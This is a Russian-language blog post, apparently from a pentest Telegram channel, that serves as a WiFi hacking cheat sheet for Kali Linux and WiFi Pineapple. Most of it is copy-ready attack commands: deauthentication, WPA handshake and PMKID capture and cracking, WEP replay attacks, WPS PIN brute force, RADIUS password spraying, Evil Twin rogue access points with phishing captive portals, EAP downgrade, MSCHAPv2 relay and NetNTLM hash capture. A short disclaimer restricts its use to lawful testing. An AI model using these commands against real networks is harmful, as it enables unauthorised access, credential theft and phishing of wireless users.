About Teletype
Join
@bh_cat
September 11, 2023

Как стать гуру или WiFi Cheat Sheet

Помните, что использование полученных знаний и навыков должно быть ограничено законными и этическими рамками, и вмешательство в чужие сети без разрешения является неприемлемым и незаконным действием.

Этот документ больше похож на чек-лист для самопроверки и может содержать полезные советы и хитрости. Все было протестировано на Kali Linux v2023.1 (64-битной версии) и WiFi Pineapple Mark VII Basic с прошивкой v1.0.2, а также на Kali Linux v2023.1 (64-битной версии) и WiFi Pineapple NANO с прошивкой v2.7.0.

В оригинале статьи был использован инструмент для проведения тестирования wifi "WiFi Pineapple NANO", но подумайте трижды, прежде чем покупать. Данный инструмент не даёт никаких преимуществ, кроме удобства, но кто мы такие - мы любители и профессионалы, а не скрипт кидди с условной штукой для взлома всего подряд. Мой совет - "не нужно заморачиваться, всё уже у вас под рукой"

Для получения справки по любым инструментам вы можете использовать команду <название_инструмента> [-h | -hh | --help] или man <название_инструмента>. Иногда опция -h может быть недоступной из-за конфликта с другой опцией, например, с опцией "хост" или какой-то другой. В таком случае используйте -hh или --help, либо прочтите руководство с помощью команды man.

Вам также могут пригодиться следующие веб-сайты при написании отчета:

cwe.mitre.org/data
owasp.org/projects
cheatsheetseries.owasp.org
nvd.nist.gov/vuln-metrics/cvss/v3-calculator

Оригинальная статья вышла в 2021 году, но кто мы такие, чтобы просто перепечатывать без внесения чего-то своего, правильно - так мы делаем, когда лень или когда лень.

Так вот, вышла CVSS v4, и по ней будут проходить расчеты

first.org/cvss/calculator/4.0

nvd.nist.gov/ncp/repository
attack.mitre.orgа

Я прикладываю ру версию митре, вы можете развернуть её у себя, если нужен гайд - пишите в комментариях, мы это уже делали.

ptsecurity.com/ru-RU/techniques/product/pt-nad

Проверьте популярный инструмент для аудита беспроводных сетей v1s1t0r1sh3r3/airgeddon. Благодарность автору!

Оглавление

А что использовать ?

Старая фотография, но показывает адаптеры, которыми я пользовался

ALFA Network AWUS036ACH чипсет RTL8812AU

Такой хватит на все ваши хотелки

ALFA Network AWUS036NHA чипсет AR9271L

Только для 2.4Gz

ALFA Network AWUS1900 чипсет RTL8814AU

Не нашел в коллекции фото.

Настройка

Просмотр конфигурации сетевых интерфейсов:

ifconfig && iwconfig && airmon-ng

Включение/отключение сетевого интерфейса:

ifconfig wlan0 up
ifconfig wlan0 down

Перезапуск менеджера сети:

service NetworkManager restart

Проверка регуляторной области беспроводной сети (WLAN):

iw reg get

Установка регуляторной области беспроводной сети (WLAN):

Увеличение/уменьшение мощности беспроводного интерфейса (высокая мощность может быть незаконной в некоторых странах):

iwconfig wlan0 txpower 40

Стоит отметить, что для некоторых wifi-адаптеров данная команда работать не будет, например для чипов rtl8814au и rtl8812au

Разные страны налагают разные ограничения на частотные каналы WiFi. Это может быть проблемой, если ваша сетевая карта или операционная система заставляют вас использовать другую конфигурацию, чем вам нужно. Существует множество причин, почему это может происходить, начиная от драйверов, предпочитающих настройки EEPROM, и заканчивая странными решениями, основанными на наблюдениях за активностью сети.

Также, можно использовать дополнительное ПО для данной настройки. Измененная конфигурация регулирования ограничения доступных частот и максимальной мощности передатчика в соответствии с региональными настройками - ссылка на github.

Мониторинг

Установка беспроводного сетевого интерфейса в режим мониторинга:

airmon-ng start wlan0
ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up

Установка беспроводного сетевого интерфейса в режим мониторинга на указанном канале:

airmon-ng start wlan0 8
iwconfig wlan0 channel 8

[Дополнительно] Остановка служб, которые могут мешать работе беспроводных сетевых интерфейсов в режиме мониторинга:

airmon-ng check kill

Вернуть беспроводный сетевой интерфейс в режим управления (managed mode):

airmon-ng stop wlan0mon
ifconfig wlan0 down && iwconfig wlan0 mode managed && ifconfig wlan0 up

Ищите беспроводные сети в вашей области:

airodump-ng --wps -w airodump_sweep_results wlan0mon
wash -a -i wlan0mon

[Дополнительно] Установите Reaver/Wash на WiFi Pineapple Mark VII:

bash
opkg update && opkg install libpcap reaver

[Дополнительно] Установите Reaver/Wash на WiFi Pineapple Nano:

bash
opkg update && opkg install libpcap && opkg -d sd install wash

Мониторинг беспроводной сети для захвата рукопожатий/запросов:

airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid

Если вы указали выходной файл, не забудьте остановить airodump-ng после завершения мониторинга, потому что это приведет к заполнению всего доступного места на диске большим файлом PCAP.

Для получения дополнительной информации о беспроводных точках доступа, такой как их MAC-адрес, название производителя и т. д., вы можете использовать инструменты, такие как Kismet или WiFi Pineapple.

Kismet - это мощный инструмент для мониторинга беспроводных сетей и анализа беспроводного трафика. Вот некоторые из его преимуществ:

  1. Мониторинг и анализ беспроводных сетей: Kismet способен обнаруживать и отслеживать беспроводные сети в реальном времени. Он может собирать информацию о доступных точках доступа, клиентах и каналах, а также анализировать сетевой трафик.
  2. Множество поддерживаемых устройств: Kismet поддерживает широкий спектр беспроводных адаптеров и карт, что делает его гибким и адаптируемым для различных аппаратных конфигураций.
  3. Графический интерфейс и командная строка: У Kismet есть как графический интерфейс для удобного просмотра и анализа данных, так и командная строка для более продвинутых пользователей.
  4. Поддержка различных форматов данных: Kismet может записывать данные в различных форматах, включая PCAP для последующего анализа в Wireshark.
  5. Поддержка GPS: Вы можете интегрировать GPS-устройство для отслеживания физического местоположения обнаруженных сетей и клиентов.
  6. Поддержка различных операционных систем: Kismet доступен для Linux, macOS и Windows, что позволяет использовать его на разных платформах.
  7. Активное сообщество и обновления: Kismet имеет активное сообщество разработчиков и пользователей, что обеспечивает постоянное обновление и поддержку инструмента.

Взлом

Проверить поддержку беспроводным интерфейсом инъекции пакетов:

aireplay-ng --test wlan1 -e essid -a FF:FF:FF:FF:FF:FF

WPA/WPA2 Handshake

Мониторинг беспроводной сети для захвата четырехступенчатого рукопожатия WPA/WPA2:

airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid

[Опционально] Деаутентифицировать клиентов из беспроводной сети:

aireplay-ng --deauth 10 wlan1 -e essid -a FF:FF:FF:FF:FF:FF

Запустить атаку словарем против рукопожатия WPA/WPA2:

aircrack-ng -e essid -b FF:FF:FF:FF:FF:FF -w rockyou.txt airodump_essid_results*.

PMKID Attack

Про него была отдельная запись на канале под #wifi

Ещё советую к прочтению статью "Pwning WPA/WPA2 Networks With Bettercap and the PMKID Client-Less Attack", но тоже достаточно старая, нужно будет заменять метод hashcat на 22000

Взлом аутентификации WPA/WPA2 без деаутентификации клиентов.

Установка необходимых инструментов на Kali Linux:

apt update && apt -y install hcxtools

Пару раз наблюдал споры в чатах, а зачем использовать именно apt-get если есть apt? Вот различия:

  1. Синтаксис команды:
    • apt-get имеет более длинную и более старую историю, поэтому его синтаксис может казаться менее интуитивным. Например, для установки пакета с использованием apt-get вы должны написать: sudo apt-get install package_name.
    • apt имеет более краткий и более современный синтаксис. Для установки пакета с использованием apt вы можете написать: sudo apt install package_name.
  2. Подсказки и автодополнение:
    • apt обладает функцией автодополнения и подсказок, что делает его более удобным для пользователей. Вы можете начать вводить команду, и apt предложит вам варианты, которые начинаются с введенных вами символов.
    • apt-get не предоставляет такой возможности, и пользователю приходится точно вводить команды без подсказок.
  3. Улучшенное отслеживание зависимостей:
    • apt более интеллектуально управляет зависимостями и может автоматически удалять ненужные пакеты после удаления других пакетов, что уменьшает вероятность "оставшегося мусора" на системе.
    • apt-get не так умно управляет зависимостями и может потребовать дополнительных действий со стороны пользователя для удаления ненужных пакетов.
  4. Интеграция с apt командами:
    • apt является частью более широкой системы apt, которая также включает команды, такие как apt-cache, apt-search и др. apt обеспечивает более единый и удобный опыт для пользователей, объединяя эти команды.

В целом, apt можно считать более современным и удобным инструментом для управления пакетами в системах Debian и Ubuntu, по сравнению с более старой и менее удобной командой apt-get. Однако apt-get все еще доступен и может быть использован в старых системах или в случаях, когда требуется более точное управление процессом установки и удаления пакетов.

[Дополнительно] Установите необходимый инструмент на WiFi Pineapple Mark VII:

opkg update && opkg install hcxdumptool

[Дополнительно] Установите необходимый инструмент на WiFi Pineapple Nano:

opkg update && opkg -d sd install hcxdumptool

Начните захват PMKID хешей для всех близлежащих сетей:

hcxdumptool --enable_status=1 -o hcxdumptool_results.cap -i wlan0mon

[Опционально] Начните захват PMKID хешей для указанных беспроводных сетей:

echo HH:HH:HH:HH:HH:HH | sed 's/\://g' >> filter.txt
hcxdumptool --enable_status=1 -o hcxdumptool_results.cap -i wlan0mon --filterlist

Иногда может потребоваться несколько часов, чтобы захватить один PMKID хеш. Извлеките PMKID хеши из файла PCAP:

hcxpcaptool hcxdumptool_results.cap -k hashes.txt

Запустите атаку словарем PMKID хешей:

hashcat -m 22000 -a 0 --session=cracking --force --status -O -o hashcat_results.txt

Автор указывал на метод 16800, который уже устарел
Тут показан актуальный метод

ARP Request Replay Attack

Если целевая беспроводная сеть не перегружена, то захват достаточного количества IVs(initialization vectors) для взлома аутентификации WEP может занять несколько дней.

Чтобы ускорить этот процесс, выполните фиктивную аутентификацию в беспроводной сети с несуществующим MAC-адресом и поддерживайте соединение:

aireplay-ng --fakeauth 6000 -o 1 -q 10 wlan1 -e essid -a FF:FF:FF:FF:FF:FF -h FF:FF:FF:FF:FF:FF

Если в сети активировано фильтрование MAC-адресов, выполните фиктивную аутентификацию в беспроводной сети с существующим MAC-адресом:

aireplay-ng --fakeauth 0 wlan1 -e essid -a FF:FF:FF:FF:FF:FF -h FF:FF:FF:FF:FF:FF

Чтобы отслеживать количество захваченных IVs(initialization vectors), запустите airodump-ng для мониторинга беспроводной сети и следите за столбцом "#Data" (попробуйте захватить около 100 000 IVs(initialization vectors)):

airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid

Запустите стандартную атаку с повторением ARP-запросов против беспроводной сети:

aireplay-ng --arpreplay wlan1 -e essid -a FF:FF:FF:FF:FF:FF -h FF:FF:FF:FF:FF:FF

[Опционально] Деаутентифицировать клиентов из беспроводной сети:

aireplay-ng --deauth 10 wlan1 -e essid -a FF:FF:FF:FF:FF:FF

Взломать аутентификацию WEP:

aircrack-ng -e essid -b FF:FF:FF:FF:FF:FF replay_arp*.cap

Атака Hirte

Атака Hirte (High-rate Injection test) - это тест высокоскоростной инъекции, который используется для проверки безопасности беспроводных сетей. Эта атака направлена на проверку, насколько устойчива сеть к высокоскоростной инъекции пакетов.

Основная идея атаки Hirte заключается в том, что она генерирует высокоскоростной поток сетевых пакетов и направляет его на беспроводную сеть. Это может использоваться для проверки наличия уязвимостей в сетевом оборудовании, которое может не справляться с такой высокой нагрузкой.

Эта атака нацелена на клиентов, а не на точки доступа беспроводных сетей. Вам необходимо знать SSID (идентификаторы беспроводных сетей) ваших целевых WiFi-сетей.

[Опционально] Настройте фиктивную WiFi-сеть WEP, если реальная сеть отсутствует:

airbase-ng -W 1 -N wlan0mon -c 8 --essid essid -a FF:FF:FF:FF:FF:FF

При необходимости включите беспроводной интерфейс, что связать клиентов с фейковой WiFi-сетью. Мы разбирали, как это сделать, в первом пункте статьи.

Чтобы мониторить настоящую/фейковую WiFi-сеть для захвата рукопожатий/запросов используйте:

airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid

Генерация пакетов клиентов в Вашем радиусе воспроизводится следующим образом:

aireplay-ng --cfrag -D wlan1 -e essid -h FF:FF:FF:FF:FF:FF

[Опционально] Для деаутентификации клиентов от настоящей/фейковой WiFi-сети используется:

aireplay-ng --deauth 10 wlan1 -e essid -a FF:FF:FF:FF:FF:FF

Перебор WEP-аутентификации:

aircrack-ng -e essid -b FF:FF:FF:FF:FF:FF airodump_essid_results*.cap

WPS PIN

WiFi Protected Setup, WPS - стандарт и одноименный протокол полуавтоматического создания WiFi-сети. Создан он был для упрощения развертывания и подключения к WiFi-сетям.

Старый тип атаки, мало где применим, попробовать в лаборатории можно.

Есть хорошая статья о данном методе - "My worst nightmare on discovering a Wi-Fi WPS vulnerability on my home router" (Работает под vpn)

Существует два типа WPS:

  • WPS с пин-кодом из восьми цифр,где на клиенте нужно ввести тот же код, то и на точке доступа
  • Кнопка WPS, которую нужно на и на точке доступа, и на клиенте с интервалом меньше пары минут

Из всего этого получается, что точки доступа WiFi с включенным WPS уязвимы к атаке брутфорса(перебора) PINа. При успешном перебора можно будет подключиться к точке доступа, а заодно и узнать её WPA/WPA2 пароль. Перебор пина невозможен на тех точках доступа, где необходимо нажимать кнопки.

Перебор WPS PINа:

reaver -vv --pixie-dust -i wlan1 -c 8 -e essid -b FF:FF:FF:FF:FF:FF

А для перебора PINа с задержкой между попытками используйте:

reaver -vv --pixie-dust -N -L -d 5 -r 3:15 -T 0.5 -i wlan1 -c 8 -e essid -b FF:FF:FF:FF:FF:FF

Атака на WPA/WPA2-Enterprise (MGT)

WPA/WPA2 Enterprise - это один из наиболее безопасных методов обеспечения безопасности беспроводных сетей, особенно в корпоративной среде. В этой подглаве статьи мы рассмотрим аспекты взлома аутентификации WPA/WPA2 Enterprise с использованием метода аутентификации MGT (Machine-Generated Token).

Захват имен пользователей RADIUS:

  • С помощью Wireshark: найдите поле «Идентификация» в сообщениях EAP типа «Ответ, Идентификация».
  • С использованием crEAP:

python crEAP.py -i mon0 -c <channel>

Перебор учетных записей RADIUS / Password Spraying

./eaphammer --eap-spray \
	--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
	--essid <target_ESSID> \
	--password <password_to_spray> \
	--user-list <usernames_list>

Флаг --interface-pool используется для предоставления eaphammer списком беспроводных интерфейсов, с помощью которых будет создано многозадачное выполнение. Ссылка на документацию

Захват и взлом рукопожатий LEAP и EAP-MD5

Протоколы EAP-MD5 и MD5 не используют безопасный туннель для аутентификации клиента. В связи с этим существует возможность перехвата вызова аутентификации и ответа на него, а затем выполнения офлайн-взлома. Это означает, что данные аутентификации могут быть подвержены риску, если не применяются дополнительные меры безопасности.

  • Захват трафика и запись захваченных рукопожатий в файл:
airdump-ng -c <channel> --bssid <AP_MAC> -w <capture> mon0
  • (Дополнительно) Деаутентификация клиента от точки доступа:
aireplay-ng --deauth 5 -c <MAC_target> -a <MAC_AP> mon0
  • Взлом
eapmd5pass r <capture> -w <wordlist>	# Для EAP-MD5
asleap -r <capture> -W <wordlist>		# Для LEAP (взлом MSCHAPv2 запроса/ответа)
asleap -C <mschapv2_challenge> -R <mschapv2_response> -W <wordlist>  # Формат запроса/ответа, разделенный двоеточием

Взлом запроса/ответа MSCHAPv2 (например, EAP-PEAPv0, EAP-TTLS, EAP-FAST)

  • MSCHAPv2 может использоваться как "Внутренний протокол EAP/Аутентификации" (внутри TLS-туннеля) в нескольких методах EAP, таких как EAP-PEAPv0, EAP-TTLS, EAP-FAST.
  • Для захвата вызова/ответа MSCHAPv2 требуется провести атаку "Зловредный AP" (Evil Twin Attack) и отключить проверку сертификата сервера на стороне клиента (см. eaphammer).
asleap -C <mschapv2_challenge> -R <mschapv2_response> -W <wordlist>

Словари

Вы можете найти классический rockyou.txt в /usr/share/wordlists или же использовать SecLists - довольно полезную коллекцию разнотипных словарей, использующуюся для оценки безопасности.

Установка словарей SecLists (будет храниться в /usr/share/seclists):

apt update && apt install seclists

Список других популярных коллекций словарей:

Password Spraying

Password Spraying или же распыление паролей - атака, в которой злоумышленник берет максимально возможное количество имен пользователей и несколько паролей, а затем подбирает каждое из имен пользователей, пока одно из них не будет подобрано верно.

Но для воспроизведения данной атаки Вам в первую очередь понадобятся несколько хороших ключевых слов, способных описать Вашу цель. Таковыми могут быть:

  • Имя компании;
  • Аббревиатуры;
  • Что-то, что связано с сервисами или продуктами цели;
  • И так далее.

Пост-эксплуатация

Если включена фильтрация MAC-адресов, то поменяйте MAC беспроводного интерфейса на существующий:

ifconfig wlan0 down && macchanger --mac FF:FF:FF:FF:FF:FF && ifconfig wlan0 up

Когда Вы получили доступ к WiFi-сети, пройдитесь следующими инструментами:

Попробуйте подключиться к WEB-интерфейсу точки доступа. Поищите в Интернете список путей и учетных записей по умолчанию.

Запустите сканирования/перебор сети.

WPA/WPA2-Personal (PSK) Rogue AP Evil Twin

  • Для проведения атаки "Evil Twin" с использованием настройки WPA/WPA2 требуется знание парольной фразы целевой сети (например, на конференции, если пароль уже был взломан...).
  • Если пароль неизвестен, можно настроить атаку "Evil Twin" с открытой сетью (например, для попытки получения парольной фразы с помощью фишинга через атаку с захватом сессии с помощью портала аутентификации).

Базовая точка доступа WPA/WPA2-PSK

С общим доступом к Интернету (по умолчанию):

berate_ap <interface_AP> <interface_internet> <SSID> <passphrase>

Без совместного использования Интернета

berate_ap -n <interface_AP> <SSID> <passphrase>

Общий доступ к Интернету через мост (предварительно настроенный интерфейс моста)

berate_ap -m bridge <interface_AP> <interface_internet> <SSID> <passphrase>

Совместное использование Интернета с того же интерфейса Wi-Fi

berate_ap <interface_AP> <interface_AP> <SSID> <passphrase>

Включить IEEE 802.11n (с частотой 40 МГц)

berate_ap --ieee80211n --ht_capab '[HT40+]' <interface_AP> <interface_internet> <SSID> <passphrase>

Включить изоляцию клиента

berate_ap --isolate-clients <interface_AP> <interface_internet> <SSID> <passphrase>

WPA/WPA2-PSK AP Evil Twin + Captive Portal Attack

С использованием wifiphisher:

wifiphisher -aI <interface_rogue_AP> -jI <interface_jamming> --essid <target_SSID> -pK <passphrase> -kN

С использованием eaphammer:

./eaphammer -i wlan0 --channel <channel_number> --auth wpa-psk \
--essid <SSID> --wpa-passphrase <passphrase> --captive-portal  # WPA2 по-умолчанию

./eaphammer -i wlan0 --channel <channel_number> --auth wpa-psk \
--essid <SSID> --wpa-passphrase <passphrase> --captive-portal --wpa-version 1  # Принудительный WPA1

Для достижения наилучших результатов в фишинге:

  • Клонировать легальную страницу (wget);
  • Скопируйте клонированную веб-страницу в каталог /var/www/html/ (eaphammer обслуживает веб-страницу отсюда в соответствии с конфигурацией Apache2 по умолчанию).

WPA/WPA2-PSK AP Evil Twin + (половинный) захват рукопожатия WPA

./eaphammer -i wlan0 --channel <channel_number> --auth wpa-psk \
--essid <SSID> --wpa-passphrase randompassphrase --capture-wpa-handhshake

WPA/WPA2-Enterprise (MGT) Rogue AP Evil Twin

Атака "Evil Twin" на сети WPA/WPA2-Enterprise возможна только в случае, если:

  1. Метод EAP, используемый для аутентификации клиента, не использует клиентский сертификат (например, EAP-TLS, PEAPv0(EAP-TTLS)), так как в этом случае нет учетных данных, которые можно было бы украсть.
  2. Метод EAP, используемый для аутентификации клиента, не требует серверного сертификата (например, EAP-MD5, LEAP), или в развертывании EAP не требуется проверка сертификатов сервера на рабочих станциях (или клиент вручную принимает недействительный сертификат, если это возможно).

Стандартные показатели (лично для меня):

  • Эта атака эффективна против устройств на операционной системе Android.
  • Эффективна против устройств на операционной системе iOS, но может потребовать подтверждения сертификата.
  • Против устройств на операционной системе Windows может быть захвачен только вызов-ответ.

WPA/WPA2-Enterprise AP Evil Twin + Кража учетных данных RADIUS

Этот тип атаки может использоваться для кражи учетных данных RADIUS (в чистом виде или, чаще всего, вызов-ответ, например, MSCHAPv2), когда используется EAP с аутентификацией клиента на основе учетных данных.

С использованием berate_ap:

(Дополнительно) Для более убедительной атаки сертификат, представляемый пользователям при аутентификации, должен быть похож на легитимный сертификат. Сертификат, используемый легитимной точкой доступа (AP), можно извлечь из захвата сети с помощью следующего инструмента: ссылка на скрипт.

./extract_EAP.sh -r <capture file>
./extract_EAP.sh -i mon0

Создание корпоративной сети (запросит информацию для использования в создаваемом сертификате) и захват учетных данных EAP:

berate_ap --eap --mana-wpe --mana-credout <file_captured_creds> <interface_AP> <interface_internet> <SSID>

Поддерживаемые режимы EAP, как минимум: ссылка на документацию:

  • EAP-PEAP/MSCHAPv2 (both PEAPv0 и PEAPv1)
  • EAP-PEAP/GTC (both PEAPv0 и PEAPv1)
  • EAP-PEAP/MD5 (both PEAPv0 и PEAPv1)
  • EAP-TTLS/EAP-MD5
  • EAP-TTLS/EAP-GTC
  • EAP-TTLS/EAP-MSCHAPv2
  • EAP-TTLS/MSCHAPv2
  • EAP-TTLS/MSCHAP
  • EAP-TTLS/PAP
  • EAP-TTLS/CHAP
  • EAP-MD5
  • EAP-MSCHAPv2
  • EAP-GTC

С использованием eaphammer:

Создание self-signed сертификатов x.509.

./eaphammer --cert-wizard

Информация о сертификатах: ссылка на документацию.

Запустите атаку "Зловредный AP" против точки доступа WPA-Enterprise и захватите учетные данные EAP:

./eaphammer -i wlan0 --channel <channel_number> --auth wpa-eap \
 --essid <SSID_corporate_wifi> --creds  # Use WPA2 by default

EAP Downgrade Attack

Сбалансированный подход (самый эффективный)

При использовании eaphammer поведение по умолчанию заключается в использовании сбалансированного подхода к снижению уровня EAP. Он предлагает следующие последовательности методов EAP во время процесса согласования EAP:

# Phase 1 (outer authentication)
PEAP,TTLS,TLS,FAST

# Phase 2  (inner authentication)
GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

Eaphammer сначала пытается снизить уровень до GTC, а затем сразу переходит к более надежным методам EAP, если попытка не удается. Этот сбалансированный подход разработан для максимизации воздействия при минимизации риска долгих согласований EAP.

Референс - Ссылка

Полное понижение версии EAP (с самого сильного до самого слабого) 

./eaphammer -i wlan0 --channel <channel_number> --auth wpa-eap  \
 --essid <SSID_corporate_wifi> --negotiate weakest --creds

В этом случае eaphammer предлагает методы EAP в следующем порядке:

# Phase 1 (outer authentication)
PEAP,TTLS,TLS,FAST

# Phase 2 (inner authentication)
GTC,TTLS-PAP,MD5,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,TTLS-MSCHAPV2,TTLS

Предупреждение: более вероятно увеличение времени согласования EAP (низкая вероятность успеха PAP, MD5, CHAP), что может снизить эффективность атаки!

Подход, оптимизированный по скорости (от самого сильного к самому слабому)

./eaphammer -i wlan0 --channel <channel_number> --auth wpa-eap  \
 --essid <SSID_corporate_wifi> --negotiate speed --creds

В этом случае eaphammer предлагает методы EAP, которые с наибольшей вероятностью будут успешными в первую очередь:

# Phase 1 (outer authentication)
PEAP,TTLS,TLS,FAST

# Phase 2 (inner authentication)
MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,GTC,TTLS-PAP,TTLS-MSCHAP,MD5

Используйте этот режим, если у вас возникли проблемы с завершением процесса аутентификации EAP клиентами в режиме по умолчанию.

WPA/WPA2-Enterprise AP Evil Twin + EAP (MSCHAPv2) Relay

Эта атака может быть использована, когда метод EAP использует MSCHAPv2 для аутентификации клиента. Она пересылает вызов/ответ к оригинальной точке доступа (AP), чтобы иметь возможность подключиться к сети без необходимости взламывать учетные данные MSCHAPv2.

  • Создание Evil Twin AP:
berate_ap --eap --mana-wpe --wpa-sycophant --mana-credout <file_captured_creds> \
<interface_AP> <interface_internet> <SSID>
  • Создайте файл конфигурации для wpa-sycophant на основе этого примера:
network={
  ssid="TestingEAP"
  # SSID, который вы хотите ретранслировать и аутентифицировать.
  scan_ssid=1
  key_mgmt=WPA-EAP
  # Do not modify
  identity=""
  anonymous_identity=""
  password=""
  # Это инициализирует переменные для меня.
  # -------------
  eap=PEAP
  phase1="crypto_binding=0 peaplabel=0"
  phase2="auth=MSCHAPV2"
  # Мы не хотим обратного подключения к себе, поэтому добавьте сюда свой поддельный BSSID.
  bssid_blacklist=00:14:22:01:23:45
}

Запустите wpa-sycophant:

./wpa_sycophant.sh -c wpa_sycophant_example.conf -i <interface>

RADIUS Credentials Management

Важно: для проведения дополнительных атак на корпоративную сеть WPA-Enterprise требуется знание учетных данных RADIUS клиента в большинстве методов EAP (особенно в методах EAP, требующих взаимной аутентификации, например, MSCHAPv2).

Учетные данные RADIUS должны быть добавлены в файл eap_user hostapd. В eaphammer доступен интерфейс для выполнения этой операции:

./ehdb --list  # List creds in local db
./ehdb --add --identity <username> --password <password>  # Добавить учетные записи в базу данных
./ehdb --add --identity <username> --nt-hash <ntlm_hash>  # Добавить учетные записи с хэшем NTLM в базу данных
./ehdb --delete --identity-is <username>  # Удалить запись из базы данных
./ehdb --delete --delete-all  # Удалить все записи в базе данных

Референс - Ссылка

WPA/WPA2-Enterprise AP Evil Twin + Captive Portal Attack

Важно: требуется знание учетных данных RADIUS клиента (добавленных в файл eap_user hostapd) в большинстве методов EAP (особенно в методах EAP, требующих взаимной аутентификации, например, MSCHAPv2).

./eaphammer -i wlan0 --channel <channel_number> --auth wpa-eap \
 --essid <SSID_corporate_wifi> --captive-portal

Для достижения наилучших результатов в фишинге:

  • Клонировать легальную страницу (wget);
  • Скопируйте клонированную веб-страницу в каталог /var/www/html/ (eaphammer обслуживает веб-страницу отсюда в соответствии с конфигурацией Apache2 по умолчанию).

WPA/WPA2-Enterprise AP Evil Twin + NetNTLM Hash Capture

Важно: требуется знание учетных данных RADIUS клиента (добавленных в файл eap_user hostapd) в большинстве методов EAP (особенно в методах EAP, требующих взаимной аутентификации, например, MSCHAPv2).

Атака с использованием враждебного портала перенаправляет HTTP-трафик на SMB-ресурс, находящийся на машине атакующего:

./eaphammer -i wlan0 --channel <channel_number> --auth wpa-eap \
 --essid <SSID_corporate_wifi> --hostile-portal

Mind карта для пентеста wifi

Ссылка

Krack - ни разу не пригодилось

Ссылка

MacStealer: Wi-Fi Client Isolation Bypass

Ссылка

tg - https://t.me/bh_cat

#wifi#pentest
@bh_cat
September 11, 2023, 11:41
1 reaction
0 views